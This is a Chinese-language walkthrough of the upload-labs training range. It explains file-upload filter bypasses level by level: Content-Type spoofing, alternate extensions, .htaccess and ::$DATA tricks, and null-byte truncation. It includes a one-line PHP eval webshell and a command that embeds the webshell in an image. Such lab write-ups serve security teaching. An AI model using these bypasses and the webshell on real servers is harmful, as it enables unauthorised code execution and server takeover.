目錄

?第一關(guān) js檢查

?第二關(guān)?Content-Type

?第三關(guān) 黑名單驗(yàn)證

?第四關(guān)?黑名單驗(yàn)證（.htaccess繞過(guò)）?

?第五關(guān)?黑名單驗(yàn)證（.user.ini）

?第六關(guān)?空格繞過(guò)

?第七關(guān) 點(diǎn)繞過(guò)?

?第八關(guān) ：：$DATA繞過(guò)?

?第九關(guān)?.空格.繞過(guò)

?第十一關(guān)?文件路徑%00截?cái)?/p>

?第十二關(guān)?文件路徑0x00截?cái)?/p>

?第十三關(guān)?文件頭檢測(cè)

查看源碼

由源代碼可知，允許上傳的文件為.jpg|.png|.gif

我們上傳一個(gè).jpg文件

利用burp suite進(jìn)行抓包

?將jpg改為php后，放包

上傳成功。

?第二關(guān)?Content-Type

查看源碼

有源碼可知，發(fā)現(xiàn)只判斷Content-Type類型，所以我們只需修改Content-Type進(jìn)行繞過(guò)即可

首先上傳php文件，抓上傳包

?

將箭頭所指的內(nèi)容改為image/jpeg或image/png或image/gif后，放包，文件即上傳成功！?

?

?第三關(guān) 黑名單驗(yàn)證

查看源代碼

?由源碼可知，本關(guān)不允許上傳.asp,.aspx,.php,.jsp類型的文件

我們可以通過(guò)不常見(jiàn)的php擴(kuò)展名繞過(guò)黑名單的限制

比如.phtml,.php3,.php4,.php5

第四關(guān)?黑名單驗(yàn)證（.htaccess繞過(guò)）?

查看源碼

源碼可知，黑名單拒絕了所有格式的文件后綴名，除了.htaccess

所以此關(guān)通過(guò).htaccess繞過(guò)進(jìn)行上傳

首先，上傳一個(gè).htaccess文件

內(nèi)容為：SetHandler application/x-httpd-php

文件命名為：.htaccess

接下來(lái)，上傳一個(gè).jpg文件

內(nèi)容為：<?php
phpinfo();
?>

文件命名為：0.jpg（文件名自己定義）

上傳即可。

?第五關(guān)?黑名單驗(yàn)證（.user.ini）

這一關(guān)和上一關(guān)差不多，只不過(guò)這一關(guān)加上了對(duì).htaccess的禁止，但是沒(méi)有將后綴進(jìn)行大小寫(xiě)統(tǒng)一

我們用burp抓包將filename="12345.php"改為filename="12345.PHP"就可以了

?第六關(guān)?空格繞過(guò)

看完提示發(fā)現(xiàn)和源碼，可以看到上面的方法都不可行

這時(shí)候就需要普及一個(gè)知識(shí)：Win下xx.jpg空格和xx.jpg.兩種文件是不被允許存在的，要是這樣命名文件，windows系統(tǒng)會(huì)默認(rèn)刪除空格或者.

在這里系統(tǒng)默認(rèn)刪除的的文件中的.

所以我們用burp抓包將filename="12345.php"改為filename="12345.php "(12345.php空格)

第七關(guān) 點(diǎn)繞過(guò)?

查看源碼

分析代碼，有去空格和所以黑名單，但是沒(méi)有去點(diǎn)。

我們只需要利用burp抓包加個(gè)點(diǎn)即可

第八關(guān) ：：$DATA繞過(guò)?

查看源碼

分析源碼可知，之前所有的點(diǎn)這關(guān)都有防范

NTFS文件系統(tǒng)包括對(duì)備用數(shù)據(jù)流的支持。這不是眾所周知的功能，主要包括提供與Macintosh文件系統(tǒng)中的文件的兼容性。備用數(shù)據(jù)流允許文件包含多個(gè)數(shù)據(jù)流。每個(gè)文件至少有一個(gè)數(shù)據(jù)流。在Windows中，此默認(rèn)數(shù)據(jù)流稱為：$ DATA。

本關(guān)中的黑名單沒(méi)有去處后綴名中的“::$DATA”

利用burp抓包，在文件后綴處加上::$DATA

?第九關(guān)?.空格.繞過(guò)

?查看提示

查看源碼

?上傳文件名后加上點(diǎn)+空格+點(diǎn)，改為12345.php. .

第十關(guān) 雙寫(xiě)文件名繞過(guò)

上傳文件，burp抓包?

?將箭頭處改為.phpphp

?第十一關(guān)?文件路徑%00截?cái)?/h4>

?查看源代碼

從代碼中可以發(fā)現(xiàn)紅線處，對(duì)上傳的文件名進(jìn)行重新拼接，使用$_GET傳參
可以通過(guò)%00進(jìn)行截?cái)嗌蟼?

上傳.php文件

使用burpsuite抓包

?在.php后增加%00.jpg,放包

?第十二關(guān)?文件路徑0x00截?cái)?/h4>

查看源碼

上傳文件123.jpg，buropsuite進(jìn)行抓包

，箭頭處添加/.jpg%00放包

第十三關(guān)?文件頭檢測(cè)

制作圖片馬

將圖片和一句話木馬放在一個(gè)文件夾下

一句話木馬為：? ?<?php @eval($_POST['attack']);?>

進(jìn)行合成，命令如下

copy 1123.jpg /b + 222.txt /a 2.jpg

上傳圖片馬

?第十四關(guān)?getimagesize()檢測(cè)

同十三關(guān)，這一關(guān)是用getimagesize函數(shù)來(lái)判斷文件類型，但是還是可以用圖片碼繞過(guò)

第十五關(guān)?exif_imagetype()檢測(cè)

png圖片webshell上傳同Pass-13。
jpg/jpeg圖片webshell上傳同Pass-13。

第十六關(guān)?突破二次渲染

上傳圖片馬

使用burpsuite攔截

在圖片尾部插入一句話木馬，密碼是123

?放包

?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-444671.html

?

?

到了這里，關(guān)于upload-labs詳細(xì)教程的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！